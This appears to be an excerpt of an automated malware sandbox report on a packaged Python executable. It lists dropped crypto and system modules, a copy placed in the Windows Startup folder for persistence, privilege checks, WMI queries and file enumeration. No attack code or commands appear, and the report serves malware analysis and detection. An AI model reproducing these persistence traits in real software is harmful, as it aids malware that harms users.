Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_x25519.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\charset_normalizer\md__mypyc.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey\_x25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\charset_normalizer\md__mypyc.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\charset_normalizer\md.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\pywin32_system32\pywintypes312.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\charset_normalizer\md.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_cffi_backend.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_cffi_backend.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\win32\win32api.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\pywin32_system32\pywintypes312.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\python312.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\win32\win32api.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_0-17110

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	API coverage: 1.8 %
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	API coverage: 2.0 %

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F4888D0 FindFirstFileExW,FindClose,	0_2_00007FF78F4888D0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F497E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF78F497E4C
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F497E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF78F497E4C
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F4A1EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF78F4A1EE4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769337E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	9_2_00007FF769337E4C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF7693288D0 FindFirstFileExW,FindClose,	9_2_00007FF7693288D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769341EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	9_2_00007FF769341EE4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF769337E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	9_2_00007FF769337E4C

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe

Code function: 2_2_00007FFBAA591490 GetSystemInfo,

2_2_00007FFBAA591490

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\	Jump to behavior

